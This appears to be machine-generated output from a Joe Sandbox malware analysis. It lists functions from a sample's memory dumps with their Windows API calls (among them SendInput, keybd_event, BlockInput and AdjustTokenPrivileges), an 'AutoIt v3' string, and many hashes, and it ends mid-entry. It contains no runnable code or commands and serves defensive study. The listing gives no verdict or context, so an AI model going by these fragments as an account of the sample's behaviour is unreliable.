Opcode Fuzzy Hash: cb92780e3fd2d62d2ec6eb52ce89e3d25a4b76f46219c4e8d5c9fb03277b53c2
Instruction Fuzzy Hash: E01190356142019FC710DF29D488A16BBE5FF85328F14C699E8698F7A2CB30EC55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00294891,?,?,00000035,?), ref: 002837E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00294891,?,?,00000035,?), ref: 002837F4

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: dc1d64555999c368520e0f2d12512daf45ca0a219d81a8cf0da919615b3fdb7a
Instruction ID: c5d6cc42b79fe6b086df1262d8e5f9467a83d855c4bafb169f1d10e1468b6bd6
Opcode Fuzzy Hash: dc1d64555999c368520e0f2d12512daf45ca0a219d81a8cf0da919615b3fdb7a
Instruction Fuzzy Hash: E3F0E5B46153292BEB2067669C4DFEB7AEEEFC5B61F000175F909D22C1D9A09D44CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0027B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 0027B25D
keybd_event.USER32 ref: 0027B270

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 98cafa292266ad9cb427ec8a0df8dd0f2119e0ae2296bf3a245d0df7714cdc57
Instruction ID: da59271a75e726464f8446dd9b3cc857d2fe7ff626842db19ced525ae560d42c
Opcode Fuzzy Hash: 98cafa292266ad9cb427ec8a0df8dd0f2119e0ae2296bf3a245d0df7714cdc57
Instruction Fuzzy Hash: 4EF01D7181424EABDB059FA0D805BBE7BB4FF05309F10800AF955A5192C7798611DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002711FC), ref: 002710D4
CloseHandle.KERNEL32(?), ref: 002710E9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 17d8b3599c75678dbc837621927e0ece39aeb8998b28e7f0ca6f01e2602b32b0
Instruction ID: eaffb27e65942f7342e1b3dcc0d55683ebf2dc44e56b8ab9721187d6ee9f48a8
Opcode Fuzzy Hash: 17d8b3599c75678dbc837621927e0ece39aeb8998b28e7f0ca6f01e2602b32b0
Instruction Fuzzy Hash: 57E04F32028610BFE7252B51FD09E7377A9EF04310B20882DF4A6804B1DF626CA0DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0024676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00246766,?,?,00000008,?,?,0024FEFE,00000000), ref: 00246998

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8cf31f1b94a2b8d07c86ca1add1d6356ceccac56186a76c73fbcb05a1e2dc65b
Instruction ID: 08beacb2ef623bd70fdd82722c9c9645b304022442204fbb4170fa81650a91f4
Opcode Fuzzy Hash: 8cf31f1b94a2b8d07c86ca1add1d6356ceccac56186a76c73fbcb05a1e2dc65b
Instruction Fuzzy Hash: 53B18C31620609CFD719CF28C48AB647BE0FF46364F25C658E899CF2A2C375E9A5CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0022B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0026851F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3dd5f34b3248f46a47fbbd65347f5910078583e8689f94653514a5caafdcca3f
Instruction ID: 06d7625aabffd61325475633162f3145ce9230e803e39c5b8758c4d19437fdf5
Opcode Fuzzy Hash: 3dd5f34b3248f46a47fbbd65347f5910078583e8689f94653514a5caafdcca3f
Instruction Fuzzy Hash: D5127071D202299BCB25DF98D8906EEB7F5FF48310F14819AE849EB251DB709E91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0028EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 0028EABD

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: dd4235acb02c4dad0fe73589f4883a4abf938ce12e46a7d367ce397005ac5a12
Instruction ID: 654c9aabeada4aeefafd31a354982f1a4a929a6420f140fde3506066dacb98db
Opcode Fuzzy Hash: dd4235acb02c4dad0fe73589f4883a4abf938ce12e46a7d367ce397005ac5a12
Instruction Fuzzy Hash: 73E048352202049FC710EF59D404D9AF7EDAF98760F118416FC45C7391DB70E8518F90

Uniqueness

Uniqueness Score: -1.00%

Function 0023781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0023798B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 6084aecbe132c824ed6addc9d39ce936c67f67ad4439630084117d0e1ec7e9aa
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: B7516CF163C7476BDF384D68445E7BE63D99B02300F180A1AE982DB282C655DE35F752

Uniqueness

Uniqueness Score: -1.00%

Function 00282046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&., xrefs: 00282053

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: 0&.
API String ID: 0-3290608233
Opcode ID: e2bd9f59836ef480e1152d72a794c3f13bfcb921825691dcbc51e82ef50b11d0
Instruction ID: a2d997bc544fc6d9022ba513d93bf0a351408078762aa80738e1889bb1874412
Opcode Fuzzy Hash: e2bd9f59836ef480e1152d72a794c3f13bfcb921825691dcbc51e82ef50b11d0
Instruction Fuzzy Hash: F721EB32661611CBDB28CF79C85367E73E9A764310F15862EE4A7C77D0DE75A908CB80

Uniqueness

Uniqueness Score: -1.00%

Function 029EA3AC Relevance: .9, Instructions: 881COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
Instruction ID: 004812b7e7c369d81e5cef2317abde2242f00f92db34cc0fb460e747ae90c639
Opcode Fuzzy Hash: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
Instruction Fuzzy Hash: 4D725075E00229DBDF25CF59C8907AEB7B5FF44314F1481AAD809EB290EB749A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00246DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f9e7defc78e6c82488fd520e517ad57900ad331f23a3ff890ef3147ed693cc
Instruction ID: 394557d48c2abf37fa427b91834f267587b5edf3527eabd23eb58cd8d0e118b5
Opcode Fuzzy Hash: 22f9e7defc78e6c82488fd520e517ad57900ad331f23a3ff890ef3147ed693cc
Instruction Fuzzy Hash: 69324522D39F024DDB279A34DC26336A64DAFB73C5F15C737E82AB59A5EB28D4834100

Uniqueness

Uniqueness Score: -1.00%

Function 02A061D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
Instruction ID: ce4fc3154595a781b4487687d60ea1e3f95350d95942109946dab49813020d12
Opcode Fuzzy Hash: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
Instruction Fuzzy Hash: B4323222D29F014DD7239638D9A1336A68DAFA77C8F14D737E81AB5DA6EF28C0D35104

Uniqueness

Uniqueness Score: -1.00%

Function 0022CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb18eadb11cd3972d5885ff0be33251cce0a3438de8d985364723b298362979
Instruction ID: c3c95aea608ec4dea549200be222215867ef0c57b022b54e653433f5ba90e59e
Opcode Fuzzy Hash: 9bb18eadb11cd3972d5885ff0be33251cce0a3438de8d985364723b298362979
Instruction Fuzzy Hash: B3321431A341569BCF28EFA8D49467D7BA1EB45304F38816BD4CACB2A1D630DEE1DB41

Uniqueness

Uniqueness Score: -1.00%

Function 002191C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ad9730e8ccc2cf708d5bac7f6bc7864b289ff1f95c6ba71a4ac9b87144c217f
Instruction ID: b1bd376c0d9046d0bcaad5e7f324b6e3fcde691f40c879180a4d5ff02be61bcc
Opcode Fuzzy Hash: 4ad9730e8ccc2cf708d5bac7f6bc7864b289ff1f95c6ba71a4ac9b87144c217f
Instruction Fuzzy Hash: A202C4B1E20106EBDF04DF64D981AAEB7B5FF54300F118169E8169B290EB71AE74CF85

Uniqueness

Uniqueness Score: -1.00%

Function 029D85C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
Instruction ID: dbeda51c1fbc19dfc6779c33b7991536182f4edb95d9e79c463f9dcfbd0dc27d
Opcode Fuzzy Hash: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
Instruction Fuzzy Hash: 7D02C5B1E00609EFDF05DF64D980BAEB7B6FF44314F508169E8169B290EB31AA15CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00231706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 7bc20f6363384791c3fe7021d0a7510caa14813600979fbe7c25b52ffa8a1e22
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 438188B36290A34DEB6D4A3A853453EFFE15A923A1B1E079DD4F2CB1C1EE14C574D620

Uniqueness

Uniqueness Score: -1.00%

Function 00292ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00292B30
DeleteObject.GDI32(00000000), ref: 00292B43
DestroyWindow.USER32 ref: 00292B52
GetDesktopWindow.USER32 ref: 00292B6D
GetWindowRect.USER32(00000000), ref: 00292B74
SetRect.USER32 ref: 00292CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00292CB1
CreateWindowExW.USER32 ref: 00292CF8
GetClientRect.USER32 ref: 00292D04
CreateWindowExW.USER32 ref: 00292D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00292D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292D80
GlobalLock.KERNEL32 ref: 00292D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00292D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292DA1
CloseHandle.KERNEL32(00000000), ref: 00292DA8
GlobalFree.KERNEL32(00000000), ref: 00292DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00292DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,002AFC38,00000000), ref: 00292DDB
GlobalFree.KERNEL32(00000000), ref: 00292DEB
CopyImage.USER32 ref: 00292E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00292E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00292E52
ShowWindow.USER32(00000004), ref: 0029303F

Strings

static, xrefs: 00292D3A, 00292E91
, xrefs: 00292FC5
AutoIt v3, xrefs: 00292CF2
DISPLAY, xrefs: 00292EA2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 94aeda847545404bc020d4d7d801710af41ec4c9ea43d2ecc57d5b7591ae7634
Instruction ID: d6108907ebccb0e4b19cd132c356b75d8634b6279a0c186dbfd59285515915ee
Opcode Fuzzy Hash: 94aeda847545404bc020d4d7d801710af41ec4c9ea43d2ecc57d5b7591ae7634
Instruction Fuzzy Hash: 03028971A10205EFDB14DF64DC8DEAE7BB9EB49710F108158F915AB2A1DB70AD11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 002A712F
GetSysColorBrush.USER32 ref: 002A7160
GetSysColor.USER32 ref: 002A716C
SetBkColor.GDI32(?,000000FF), ref: 002A7186
SelectObject.GDI32(?,?), ref: 002A7195
InflateRect.USER32 ref: 002A71C0
GetSysColor.USER32 ref: 002A71C8
CreateSolidBrush.GDI32(00000000), ref: 002A71CF
FrameRect.USER32 ref: 002A71DE
DeleteObject.GDI32(00000000), ref: 002A71E5
InflateRect.USER32 ref: 002A7230
FillRect.USER32 ref: 002A7262
GetWindowLongW.USER32(?,000000F0), ref: 002A7284

Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7421
Part of subcall function 002A73E8: SetTextColor.GDI32(?,?), ref: 002A7425
Part of subcall function 002A73E8: GetSysColorBrush.USER32 ref: 002A743B
Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7446
Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7463
Part of subcall function 002A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002A7471
Part of subcall function 002A73E8: SelectObject.GDI32(?,00000000), ref: 002A7482
Part of subcall function 002A73E8: SetBkColor.GDI32(?,00000000), ref: 002A748B
Part of subcall function 002A73E8: SelectObject.GDI32(?,?), ref: 002A7498
Part of subcall function 002A73E8: InflateRect.USER32 ref: 002A74B7
Part of subcall function 002A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002A74CE
Part of subcall function 002A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002A74DB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: e1920d8ce4d10716b25e55d1f0609518364bf22f06aaa882ccb4f232cc2adcab
Instruction ID: fdd217266808b271caa47bff8f9fbc6d5ee379c6e4f86846829d51ce20e8517f
Opcode Fuzzy Hash: e1920d8ce4d10716b25e55d1f0609518364bf22f06aaa882ccb4f232cc2adcab
Instruction Fuzzy Hash: 24A1A372518301AFDB009F60EC4CA5BBBE9FF4A320F200A19F966A61E1DB71E954CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00228D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00228E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00266AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00266AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00266F43

Part of subcall function 00228F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00228FC5

SendMessageW.USER32(?,00001053), ref: 00266F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00266F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00266FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00266FB7

Strings

0, xrefs: 00266DCF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
